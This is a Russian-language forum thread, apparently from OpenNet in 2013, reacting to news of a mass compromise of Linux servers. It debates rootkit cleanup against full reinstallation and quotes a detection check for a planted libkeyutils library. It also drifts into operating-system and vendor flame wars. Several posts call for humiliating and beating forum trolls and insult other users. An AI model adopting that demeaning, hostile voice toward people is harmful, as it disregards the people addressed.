Сообщение от Michael Shigorin email(ok) on 23-Фев-13, 22:10 
>> Коллеги, кто мудрей -- тот пусть остановится первым.
> Извините, а модераторские обязанности вы выполнять не планируете?

Выполняю в меру сил и возможностей, сейчас нагрузка больше обычной.

PS: вот и не надо отвечать гопникам словесно, вызывайте сразу {ми,по}лицию в тред. :)

Ответить | Правка | ^ к родителю #658 | Наверх | Cообщить модератору

726. "И как нельзя КСТАТИ"  +/
Сообщение от Led (ok) on 24-Фев-13, 04:02 
>>> Коллеги, кто мудрей -- тот пусть остановится первым.
>> Извините, а модераторские обязанности вы выполнять не планируете?
> Выполняю в меру сил и возможностей, сейчас нагрузка больше обычной.
> PS: вот и не надо отвечать гопникам словесно, вызывайте сразу {ми,по}лицию в
> тред. :)

Вообщето, номальная {ми,по}лиция, это та, которая следит за порядком, а не та, которую нужно вызывать (только для того, чтоьы она приехав, сказала "мальчики, не ссортесь", "будь умнее" и т.п.), а также та которая за сёр в общественном месте изолирует, а не поощряет его.

Ответить | Правка | ^ к родителю #725 | Наверх | Cообщить модератору

693. "И как нельзя КСТАТИ"  +/
Сообщение от arisu (ok) on 22-Фев-13, 03:42 
>> как самокритично о себе..
> Коллеги, кто мудрей — тот пусть остановится первым.

это в корне неверный подход. гопников надо бить, иначе в варианте «ну, я же умней, я остановлюсь первым» отхватишь полновесных. от того, что некоторые гопники с огромным трудом научились кое-как читать и писать, они не перестали быть гопниками.

существо с невнятно-провокативным ником — гопник типичный. на любой конкретный вопрос с предложением подтвердить изрекаемый бред это существо или пишет «сам в гугле найди», или вообще молчит. единственный вариант общения с таким (ну, коли уж приходится) — оплёвывать и унижать. потому что вариант обучения при помощи бамбуковой палки — увы — недоступен.

p.s. по-моему, под этим ником не один скорбный главою пишет.

Ответить | Правка | ^ к родителю #557 | Наверх | Cообщить модератору

695. "И как нельзя КСТАТИ"  +1 +/
Сообщение от бедный буратино (ok) on 22-Фев-13, 03:51 
> существо с невнятно-провокативным ником — гопник типичный. на любой конкретный вопрос
> с предложением подтвердить изрекаемый бред это существо или пишет «сам в
> гугле найди», или вообще молчит. единственный вариант общения с таким (ну,
> коли уж приходится) — оплёвывать и унижать. потому что вариант обучения
> при помощи бамбуковой палки — увы — недоступен.

Унижать дитё неразумное не стоит, потому что вырастет, и подумает, что все так делают, и что это такой порядок вещей. Нужно воспитывать.

Но! Когда методы удаления недоступны, а само не уходит, тогда, в малых дозах, под строгим присмотром врача, возможно введение некоторых препаратов. Во всём должна быть мера. А то воспитаем на свою голову тех, кто, когда ему чуть что-то не нравится, сразу будет изображать из себя обиженную Лигу Наций и начинать свои ковровые бомбардировки по любому пустяку.

Проблема сейчас только одна - всё завалено этим спамом. И тут что бей, что не бей... Претензия даже не к мифической тупости или мифическим оскорблениям, а в однообразии - у человеков нет вообще никакой своей мысли, никакого своего мнения, и они, с упорством, с которым они бы могли лично давно переписать все фотошопы на gtk,qt и fltk одновременно, постят сюда одно и то же. В 1500-й раз это начинает надоедать. И очень мешает обсуждать, собственно, новости.

Ответить | Правка | ^ к родителю #693 | Наверх | Cообщить модератору

573. "И как нельзя КСТАТИ"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 21:59 
> как самокритично о себе.. заметте - хамить начали первые вы.

Нет, извините, хамить начали вы. Хотя-бы в вашем нике. Просто вы настолько закоренелое хамло что воспринимаете ваше хамство как данность. И вообще не обращаете на него внимание.

Ответить | Правка | ^ к родителю #551 | Наверх | Cообщить модератору

12. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +28 +/
Сообщение от VoDA (ok) on 19-Фев-13, 14:22 
Запасаемся попкорном и ожидаем сначала шоу по выявлению заразы, а потом эпических батлов линуксоиды-против-виндузоидов, линуксоиды-против-фрибээсдешников. А в конце супер финал: линуксоиды-против-всех

:D

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 14:27 
Да щазз. Найдут, выпустят инструменты диагностики, апдейт, все заинтересованные пропатчатся и всё успокоится.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

40. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Michael Shigorin email(ok) on 19-Фев-13, 15:00 
> Да щазз. Найдут, выпустят инструменты диагностики, апдейт,
> все заинтересованные пропатчатся и всё успокоится.

Сломанным ещё переустанавливать начисто, перенося только данные и с контролем -- конфигурацию.

Или жить на пороховой бочке.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

51. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:07 
Разумеется. Та ещё возня...
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

81. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от Аноним (??) on 19-Фев-13, 15:25 
> Разумеется. Та ещё возня...

Тем более что правильная вычистка руткита требует высокой квалификации админа + детального знания работы конкретно этого руткита. Иначе может так оказаться что недобитый руткит втихаря себя восстановит, например.

Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

258. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Клыкастый (ok) on 19-Фев-13, 18:11 
реинсталл - это правильная вычистка руткита.
Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

269. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от DeadLoco (ok) on 19-Фев-13, 18:24 
Да ладно. Если на серванте лежит стопицот терабайт баз и 200МБ собсно системы, то куда правильнее полечить побитое, а не гонять туда-сюда эти стопицот терабайт. Тем более, что это несложно, всего-то сверить хеши файлов с контрольной копией. Если не совпадают - менять на запаску. По большому счету, /бин, /сбин, /либ етц можно вообще держать тут же в криптованом архиве. Только грузиться нужно, разумеется, с чистого носителя, того же ливцд.
Ответить | Правка | ^ к родителю #258 | Наверх | Cообщить модератору

280. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от sanDro (ok) on 19-Фев-13, 18:46 
ну если у вас ваши "стопицот терабайт" терабайт лежат на том же разделе диска что и система (или её часть), то это ваши проблемы.
Ответить | Правка | ^ к родителю #269 | Наверх | Cообщить модератору

281. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от Клыкастый (ok) on 19-Фев-13, 18:46 
> Да ладно. Если на серванте лежит стопицот терабайт баз и 200МБ собсно
> системы, то куда правильнее полечить побитое, а не гонять туда-сюда эти
> стопицот терабайт. Тем более, что это несложно, всего-то сверить хеши файлов
> с контрольной копией. Если не совпадают - менять на запаску.

руткит - это когда нет основания доверять системе. в том числе в плане "совпадает/не совпадает контрольная сумма"

> По большому счету, /бин, /сбин, /либ етц можно вообще держать тут же
> в криптованом архиве. Только грузиться нужно, разумеется, с чистого носителя, того
> же ливцд.

то, что вы описали, мало чем отличается от реинсталла.

Ответить | Правка | ^ к родителю #269 | Наверх | Cообщить модератору

290. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:04 
> стопицот терабайт. Тем более, что это несложно, всего-то сверить хеши файлов
> с контрольной копией. Если не совпадают - менять на запаску.

А если руткит не тупой и подсовывает правильные копии файлов? Тогда чего? Этот фокус умели даже совершенно доисторические вири под дос, между прочим.

Ответить | Правка | ^ к родителю #269 | Наверх | Cообщить модератору

292. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 19:06 
А, блин, читать надо до конца :(

> Только грузиться нужно, разумеется, с чистого носителя, того же ливцд.

Ну тогда и отличий от реинсталла будет минимум. Ну гемора будет побольше. А ради чего - хз.

Ответить | Правка | ^ к родителю #290 | Наверх | Cообщить модератору

296. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Клыкастый (ok) on 19-Фев-13, 19:07 
собственно я о том же
Ответить | Правка | ^ к родителю #290 | Наверх | Cообщить модератору

322. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 19:40 
>> стопицот терабайт. Тем более, что это несложно, всего-то сверить хеши файлов
>> с контрольной копией. Если не совпадают - менять на запаску.
> А если руткит не тупой и подсовывает правильные копии файлов? Тогда чего?
> Этот фокус умели даже совершенно доисторические вири под дос, между прочим.

так дя этого фокуса надо чтобы система была под управлением трояна, а в нашем 2013 после руткита все действия проверки и восстановления делают с лайвсиди или подобным способом.

Ответить | Правка | ^ к родителю #290 | Наверх | Cообщить модератору

387. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 21:51 
> с лайвсиди или подобным способом.

Ну так проще всего вкатить оттуда снос всего и вся + реинсталл. А то недоглядишь какую-нибудь мелкую пакость и оно оттуда воскреснет. А оно надо?

Ответить | Правка | ^ к родителю #322 | Наверх | Cообщить модератору

414. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Anonim (??) on 19-Фев-13, 22:57 
> реинсталл - это правильная вычистка руткита.

Раньше над виндузятниками смеялись, что те (к стати успешно) борются с любыми проблемами с помощью переустановки.

Ответить | Правка | ^ к родителю #258 | Наверх | Cообщить модератору

416. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Michael Shigorin email(ok) on 19-Фев-13, 23:08 
>> реинсталл - это правильная вычистка руткита.

+1

> Раньше над виндузятниками смеялись, что те (к стати успешно) борются
> с любыми проблемами с помощью переустановки.

Разницу между "любыми проблемами" и отработавшим руткитом -- осознаёте?

Вне зависимости от используемой ОС _единственный_ известный мне правильный метод возвращения хоста, на котором получили полные привилегии, в работу -- это установка бинарников с нуля, перенос данных и (с проверкой глазами/скриптами как минимум в местах вроде /etc/passwd) конфигурации, лучше из бэкапа, чем с (по возможности отложенной в сторонку для возможности более внимательного изучения) ФС по состоянию на момент отключения хоста от средств коммуникации.

Ответить | Правка | ^ к родителю #414 | Наверх | Cообщить модератору

433. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +5 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 02:48 
>> реинсталл - это правильная вычистка руткита.
> Раньше над виндузятниками смеялись, что те (к стати успешно) борются с любыми
> проблемами с помощью переустановки.

И правильно смеялись.


> "Два утра". Пьеса без действия. <

Захотелось мне, например, с утра начать новую жизнь. Снести всё ненужное, всё, что уже неактуально, всё, что пробовалось, но не пригодилось (и сами приложения, и настройки). Чтобы не разбираться с существующим - поставить с нуля и потом добавлять "нужное по требованию".


РЕЗЕРВИРОВАНИЕ.

У меня вся система из репозитория, а арч из двух - стандартного и собствеенного, который есть как минимум на двух сетевых носителях. Мне нужно задумываться только о сохранности данных, но у меня об этом думает hg, кроме резервирования обеспечивая меня ещё какими-то плюшками.

В windows же я не могу сказать в одно слово "система, стань, как вчера". Мне нужно будет регулярно ОТВЛЕКАТЬСЯ ОТ ОСНОВНОЙ задачи, чтобы заниматься резервированием приожений, данных в бинарных форматах реестра, и так далее. Если я что-то пропустил, или оказался в неродных условиях, мне нужно делать всё с нуля.
Ужасное, утомительное и рутинное действие.


ПЕРЕУСТАНОВКА.

Я просто делаю debootstrap, pacstrap или installpkg --root /mnt/sda92 /srv/sl14/a/*.t?z
Можно даже из рабочей системы, пульнул и забыл. Потом вернулся, поправил fstab, locale, localtime, и добавил в загрузчик вручную или автоматически. Всё, для всего остального существует пакетный менеджер.

Это не так, чтобы час пялиться в окна установщика, отвечать на неинтересные вопросы, а на выходе получить систему с косынкой, где всё только начинается. Вот честно, когда я последний раз поставил свою занюханную копию XP, и представил, сколько всего сейчас предстоит сделать, чтобы этим пользоваться, и сколько рутинных однообразных действий предстоит сделать, я просто удалил эту установленную копию. Потому что НЕИНТЕРЕСНО.


ДАННЫЕ.

Я открываю в mc две панели, одну со старым home, другую с новым. И для тех приложений, которые мне понадобятся, просто делаю 'i like to move it, move it'.

В винде - всё разбросано по папкам, хомякам, реестрам. Как в этом хаосе выбрать только нужное? Практически нереально. Особенно в реестре с миллионом записей, 99.5% которых вообще не интересуют.


ДОГОНКА.

Я нажимаю в mc ENTER на zip.zip, а мне говорят "unzip не найден". "Какой ужас", в притворстве пугаюсь я, делаю pacman -S unzip-beta, и через 20 секунд уже использую этот архив. Забыл что-то поставить, pacman -S и apt-get install решат все проблемы.

В винде я натыкаюсь на архив 7z, говорю мля, иду подключаться к интернету (иногда это тоже требует решить несколько проблем), зайти на сайт (иногда это требует предварительно выбрать браузер), скачать, ответить на серию неинтересных вопросов. И так 70 раз, и по кругу, и по кругу, и за...сь, о....ть не встать и вообще ура.


ВЫВОД.

Переустановка делается быстро, гибко, и не приносит дискомфорта.

Переустановка винды требует серьёзной подготовки ДО, и серьёзной свистопляски ПОСЛЕ. Гибкостью и не пахнет. Пахнет мучениями и нафталином.


ПРОЧЕЕ.

Кроме того, у меня с 1 дня серьёзного использования linux было суровое правило транзакционности - я не использую конкретную систему, пока не получу копию локального репозитория.
И потом уже "хоть мне зной, хоть мне дождик проливной", и выбивание из интернета хоть на три дня не собъёт меня с мысли - я буду продолжать делать то, что делал, а не отвлекаться с одной задачи, которая у меня в голове, на задачу, которую мне не хочется решать. И у меня в пакетах есть документация, и мне не нужно ждать интернета, чтобы посмотреть где-то на задворках сети нужный ключик в реестре. :)

Ответить | Правка | ^ к родителю #414 | Наверх | Cообщить модератору

464. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Клыкастый (ok) on 20-Фев-13, 10:25 
Описано всё чётко, за исключением того, что у вантузятников есть "точки отката" и козырной ход "восстановление из акрониса". Проблем не решает полностью, но степень кошмара несомненно снижает.
Ответить | Правка | ^ к родителю #433 | Наверх | Cообщить модератору

574. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 22:04 
> Описано всё чётко, за исключением того, что у вантузятников есть "точки отката"

Особенно смешно когда вирье попадает в system protected files и авер тщетно пытается его оттуда удалить. Система очень стойко обороняет вирусы от удаления, не забывая восстанавливать измененную "негодяем"-антивирусом копию файла обратно на завирусованную версию. Очень забавная картинка, я бы сказал :)

> и козырной ход "восстановление из акрониса".

А кто будет мухлевать - будем бить по наглой рыжей морде. Акронис это вообще сторонняя коммерческая программа. Она стоит денег и вообще прелполагается что ее где-то взяли.

И главное не понятно вот что: почему это преподносится как "козырь"? В других системах подобные фортели можно даже встроенными утилитами откалывать, не платя каким-то отдельным личностям за коммерческую программу. В чем козырность то заключается?

Ответить | Правка | ^ к родителю #464 | Наверх | Cообщить модератору

729. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Клыкастый (ok) on 25-Фев-13, 11:09 
>> Описано всё чётко, за исключением того, что у вантузятников есть "точки отката"
> Особенно смешно когда вирье попадает в system protected files и авер тщетно
> пытается его оттуда удалить.

Или не тщетно.

> версию. Очень забавная картинка, я бы сказал :)

забавная. и?

>> и козырной ход "восстановление из акрониса".
>  Акронис это вообще сторонняя коммерческая программа. Она стоит денег и вообще прелполагается что ее где-то взяли.

"акронис" в данном случае собирательный образ. ну clonezilla. или акронис купили - ппочему нет?

> И главное не понятно вот что: почему это преподносится как "козырь"?

позволяет не вникать в суть проблем - просто откатился и всё.

Ответить | Правка | ^ к родителю #574 | Наверх | Cообщить модератору

46. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от linux must _RIP_ on 19-Фев-13, 15:02 
> Да щазз. Найдут, выпустят инструменты диагностики, апдейт, все заинтересованные пропатчатся
> и всё успокоится.

для диагностики уже выпустили.
=>Added new LF_EXPLOIT check SSHDSPAM to check for the existence of
/lib64/libkeyutils.so.1.9 or /lib/libkeyutils.so.1.9

..
только как защититься - не понятно.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

50. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:07 
По вашей же ссылке видно, что есть вариант, в котором библиотека называется по-другому.
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

253. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от arisu (ok) on 19-Фев-13, 18:07 
> только как защититься - не понятно.

поставить винду.

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

295. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:07 
> поставить винду.

Не, лучше minix. Там shared libs нет. Прикинь как хакеры обломаются?! Вот хочешь ты шаред либ вгрузить, а система так просто не умеет. Ололо.

Ответить | Правка | ^ к родителю #253 | Наверх | Cообщить модератору

203. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 17:32 
А затем вторая, потом n-ая часть марлезонского балета :-)
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

63. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +12 +/
Сообщение от цирроз (ok) on 19-Фев-13, 15:14 
только вантузячнеки помалкивают о фичах восьмёрки, которая может отправлять втихаря данные о корректности ключей всего установленного софта. хотя нет, они не помалкивают, абсолютное большинство элементарно не знают.

пропиретарщики подождут немного, а потом массово начнут нагибать кулхацкеров и их "клиентов", выставляя счета. вот где много попкорна понадобится.
такая вот селяви, просто жуть

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

101. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 15:48 
> только вантузячнеки помалкивают о фичах восьмёрки, которая может отправлять втихаря данные
> о корректности ключей всего установленного софта. хотя нет, они не помалкивают,
> абсолютное большинство элементарно не знают.
> пропиретарщики подождут немного, а потом массово начнут нагибать кулхацкеров и их "клиентов",
> выставляя счета. вот где много попкорна понадобится.
> такая вот селяви, просто жуть

Селяви из разряда "а у вас негров линчуют".

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

106. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от цирроз (ok) on 19-Фев-13, 15:52 
а вы тоже не знали, или из кулхацкеров будете?
Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

173. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от Аноним (??) on 19-Фев-13, 17:03 
> а вы тоже не знали, или из кулхацкеров будете?

Мне пофигу. У меня на серверах Солярис 10.

Ответить | Правка | ^ к родителю #106 | Наверх | Cообщить модератору

307. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:23 
> Мне пофигу. У меня на серверах Солярис 10.

Действительно - при этом будут другие проблемы. С политикой оракла - никаких троянов не надо: враг уже внутри.

Ответить | Правка | ^ к родителю #173 | Наверх | Cообщить модератору

458. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –5 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 08:11 
только для нищебродов которым обновления нужны на халяву.
Кстати - вы не подскажете - давно RedHat разрешил на халяву использовать обновления своего дистрибутива?
Что-то я не помню большой волны возмущения когда они закрыли бинарные пакеты..
А вот против Oracle - дикая обида за тоже..

Мисье лицемер?

Ответить | Правка | ^ к родителю #307 | Наверх | Cообщить модератору

477. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от цирроз (ok) on 20-Фев-13, 12:22 
>не помню большой волны возмущения когда они закрыли бинарные пакеты..

лицемер в своём глазу бревны не заметил, т.к. ты желаемое за действительное выдаёшь. или память у тебя сильно короткая, либо ты просто туповат.
>нищебродов

о, да. это в стиле вани и поллитрухина. месье папенькин сыночек, или просто тут студентик из MicroSoft Student Partners пытается пальцами гнуть?

Ответить | Правка | ^ к родителю #458 | Наверх | Cообщить модератору

550. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 19:31 
О да.. Оракл закрыл бинарные обновления на OpenNet были толпы возмущенных - которым на халяву перестали давать пакеты.

Когда RedHat сказал - фик вам а не пакеты - где эти толпы?! Не видел.. все проглатили и стали рассказывать как redhat хорошо вкладывается в opensource. Так Oracle тоже не меньше вкладывает..

Только почему-то Oracle не хвалят.. А RedHat который так же обновления денег хочет - пытаются хвалить.
Надеятесь на скидку от RedHat?

Ответить | Правка | ^ к родителю #477 | Наверх | Cообщить модератору

552. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от AlexAT (ok) on 20-Фев-13, 19:33 
> Только почему-то Oracle не хвалят.. А RedHat который так же обновления денег
> хочет - пытаются хвалить.
> Надеятесь на скидку от RedHat?

Ммм... моя скидка от RH = CentOS. WTF?

Ответить | Правка | ^ к родителю #550 | Наверх | Cообщить модератору

559. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от qux (ok) on 20-Фев-13, 20:33 
> Так Oracle тоже не меньше вкладывает..
> Только почему-то Oracle не хвалят..

Почитать где-то можно? А то на слуху больше как Оракл закрывает купленное, а шапка открывает.

Ответить | Правка | ^ к родителю #550 | Наверх | Cообщить модератору

560. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Michael Shigorin email(ok) on 20-Фев-13, 20:36 
> Только почему-то Oracle не хвалят..

Оракл хорошего делает ещё меньше, чем редхат, а плохого -- ещё больше.  Вот и вся разница.

PS re #477: он не MSSP, а когда-то работал в Sun, затем в Oracle, а героически отмазать последний и перевалить на шляпу старается до сих пор зачем-то.

Ответить | Правка | ^ к родителю #550 | Наверх | Cообщить модератору

562. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 20:45 
Шигорин,

Оракл делает мало? закрыает?

Пардоньте - все что закрыто за последнее время - это тесты к MySQL. по вполне себе адекватным причинам.
И закрыты бинарные пакеты к Solaris - которые кстати у шапки тоже закрыты.
Более того - шапка в своей EULA - запрещает установку триальных версий на систему с более чем 2мя сокетами. И весьма мутный момент на счет вообще установки их пакетов на большее число систем чем указано в лицензии.

Так зачто любить то?

Ответить | Правка | ^ к родителю #560 | Наверх | Cообщить модератору

570. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Michael Shigorin email(ok) on 20-Фев-13, 21:45 
> Шигорин, Оракл делает мало?

Хорошего -- мало.

> закрыает?

Да, и много.  Или гробит.

> Пардоньте - все что закрыто за последнее время - это тесты к
> MySQL. по вполне себе адекватным причинам.

Спасибо, теперь я как майнтейнер MySQL в альте всерьёз раздумываю оставить его "про запас" и передать приоритет MariaDB (сборка уже давно есть).

> Так зачто любить то?

У меня есть причины уважать и шляпу, и оракл -- но причин недолюбливать и избегать их обоих ещё больше, увы.  В основном из-за того плохого, что они делают.

Ответить | Правка | ^ к родителю #562 | Наверх | Cообщить модератору

738. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от PereresusNeVlezaetBuggy (ok) on 23-Мрт-13, 16:00 
>> Пардоньте - все что закрыто за последнее время - это тесты к
>> MySQL. по вполне себе адекватным причинам.
> Спасибо, теперь я как майнтейнер MySQL в альте всерьёз раздумываю оставить его
> "про запас" и передать приоритет MariaDB (сборка уже давно есть).

В опёнке уже полным ходом тестируется переезд на MariaDB. :) В 5.4 MySQL, скорее всего, просто выпилят, оставив путь для миграции. Ибо в Oracle слишком долго и мутно чинят баги, в том числе секурные.

Ответить | Правка | ^ к родителю #570 | Наверх | Cообщить модератору

580. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 23:41 
> только для нищебродов которым обновления нужны на халяву.

Ах, сколько батхерта в этом звуке. Какие помпезные оправдания. Прямо любо-дорого смотреть.

> Кстати - вы не подскажете - давно RedHat разрешил на халяву использовать
> обновления своего дистрибутива?

У линукса есть коронное преимущество: это не театр одного актера, поэтому там возможна туева хуча вариантов. Без стопроцентной зависимости от придури одного конкретного вендора. Это очень важная для меня фича. Потому что если мне не нравится политика одного дистра - я могу выбрать другой. С другой политикой. Проголосовав ногами/баблом/... .

> Что-то я не помню большой волны возмущения когда они закрыли бинарные пакеты..

Наверное потому что редхат соблюдает GPL как и все остальные и не является чем-то таким особо-привилегированным. А сани и оракл всегда хотели ставить себя выше других, в том числе и зажимонами ядерных компонентов. Ну и закончилось это тем что жлобы сами себя и обжлобили в результате. Куда и дорога. Вот кого мне не жаль - так это жадных будаков.

> А вот против Oracle - дикая обида за тоже..

На оракль нет дикой обиды. Есть просто элементарное понимание что влопываться в д@рьмо - неприятно. А зависимость от 1 вендора без внятных альтернатив и даже без просто полного сорца ядра системы - это знатное влипание в д@рьмо. Дураков нет, ищите их в другом месте.

> Мисье лицемер?

Очень актуальный вопросец при вашем нике, я бы сказал. Походу да, вы лицемер. Ну и просто несмеяна которая страдает батхертом по поводу того что отходы мозговой деятельности вашего оракла теперь никому нафиг не упали. Тем более что оракл своими мегаконскими условяими окончательно узаконил такое положение дел. А то что вы в это вляпались - к счастью останется только вашими проблемами. И моими проблемами не будет. Очень приятно это осознавать.

Ответить | Правка | ^ к родителю #458 | Наверх | Cообщить модератору

516. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от Адекват on 20-Фев-13, 14:49 
>> а вы тоже не знали, или из кулхацкеров будете?
> Мне пофигу. У меня на серверах Солярис 10.

А у меня на серверах спектрумы и мне пофигу на все ваши эксплоиты.

Ответить | Правка | ^ к родителю #173 | Наверх | Cообщить модератору

575. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Карбофос (ok) on 20-Фев-13, 22:09 
напомнило: а мне пофигу, у меня шапочка на вате
Ответить | Правка | ^ к родителю #173 | Наверх | Cообщить модератору

219. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от цирроз (ok) on 19-Фев-13, 17:43 
но ведь шерстят, даже без фич для слива. причём, просто приходят и говорят: доказывайте, что софт у вас не ворованный. это как "доказывайте, что вы не убили никого этим перочинным ножом". абсурд, но таковы реалии. народ на линуксе работает, а с них даже в этом случае квитанцию требуют.
Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

228. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 17:50 
Шерстят фирмы


Ответить | Правка | ^ к родителю #219 | Наверх | Cообщить модератору

231. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от цирроз (ok) on 19-Фев-13, 17:54 
знаю, что фирмы. зато теперь открывается прекрасная возможность конкретному человеку предъявить конкретный список. тут даже показательные разборки с Поносовым покажутся детским садом.
Ответить | Правка | ^ к родителю #228 | Наверх | Cообщить модератору

224. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от none_first (ok) on 19-Фев-13, 17:47 
> вендузятники люди цивилизованные, и софт как правило покупают. Что это в России
> не совсем так, так во-первых это Россия, а во-вторых чистить российских
> нищебродов никому нафиг не упало :-)

угу именно поэтому большинство вареза и кейгенов именно для винды :)
это наверное покупалка не выросла? ;)

Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору
Часть нити удалена модератором

236. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:56 
> А патаму шта под линапс нормального софта нет, подо что кейгены то
> делать ? :-)

В венде даже нормального ядра нет. Я уже не говорю о каких-либо гарантиях.

Ответить | Правка | ^ к родителю #228 | Наверх | Cообщить модератору

243. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 18:00 
> В венде даже нормального ядра нет. Я уже не говорю о каких-либо
> гарантиях.

Она и "без ядра" уделывает линапс на декстопах как котенка :-)
А что, линус или GPL выдают гарантию ? :-)


Ответить | Правка | ^ к родителю #236 | Наверх | Cообщить модератору

293. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 19:06 
обделывает
Ответить | Правка | ^ к родителю #243 | Наверх | Cообщить модератору

297. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 19:08 
> обделывает

Обделывают то, что можно обделывать :-)

Ответить | Правка | ^ к родителю #293 | Наверх | Cообщить модератору

310. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:25 
> А что, линус или GPL выдают гарантию ? :-)

Нет, просто там отказ от гарантий точно такой же как и везде. А если нет разницы - зачем платить больше? :)

Ответить | Правка | ^ к родителю #243 | Наверх | Cообщить модератору

326. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от ZloySergant (ok) on 19-Фев-13, 19:44 
>А что, линус или GPL выдают гарантию ? :-)

Не, я, понятно, для работы Слаку использую давно уже. Многа лет, можно сказать. С тех пор что, Мелкомягкие там, Ябблы всякие, Бзди разные, какие-то гарантии работоспособности своей системы давать начали???

Ответить | Правка | ^ к родителю #243 | Наверх | Cообщить модератору

330. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от SergMarkov email(ok) on 19-Фев-13, 19:54 
> Не, я, понятно, для работы Слаку использую давно уже. Многа лет, можно
> сказать. С тех пор что, Мелкомягкие там, Ябблы всякие, Бзди разные,
> какие-то гарантии работоспособности своей системы давать начали???

А какие гарантии дает Патрегх ? :-) Я сам, допустим, сейчас пишу из под нее же. Бздю то за что пнул ? :-)


